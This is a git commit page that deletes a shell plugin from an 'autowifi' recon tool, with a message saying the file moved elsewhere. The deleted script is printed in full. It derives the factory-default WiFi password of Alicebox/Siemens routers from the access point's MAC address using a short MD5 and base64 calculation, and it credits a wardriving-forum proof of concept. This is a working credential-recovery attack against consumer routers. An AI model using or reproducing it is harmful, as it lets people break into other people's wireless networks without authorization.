summaryrefslogtreecommitdiffstats
path: root/usr/lib/autowifi/plugins/02alice
diff options
context:
space:
mode:
authormakefu <github@syntax-fehler.de>2014-12-20 22:08:23 +0100
committermakefu <github@syntax-fehler.de>2014-12-20 22:08:33 +0100
commitdbaee4aae713410b813f871bb8e8594a9d84f814 (patch)
treed2f5d37c6bad81f3e87c13628933e505c8237315 /usr/lib/autowifi/plugins/02alice
parent16e1373ddd9050dd06cd699b2874cf178375574b (diff)
autowifi-merged files to recon/autowifi
Diffstat (limited to 'usr/lib/autowifi/plugins/02alice')
-rwxr-xr-xusr/lib/autowifi/plugins/02alice20
1 files changed, 0 insertions, 20 deletions
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice
deleted file mode 100755
index 1b4533a4..00000000
--- a/usr/lib/autowifi/plugins/02alice
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/bin/sh
-# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
-# Based on Poc from
-# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
-#
-#
-# ESSID MAC CHANNEL ENCRYPTION
-
-cd $(dirname $(readlink -f $0))
-. ../lib/plugin_core
-
-parse_plugin_args "$@"
-
-! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
-
-# printf always makes string to lower, need that for correct md5sum
-ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
-TMP=$(printf $ETHMAC | md5sum)
-printf ${TMP:0:12} | base64
-exit 0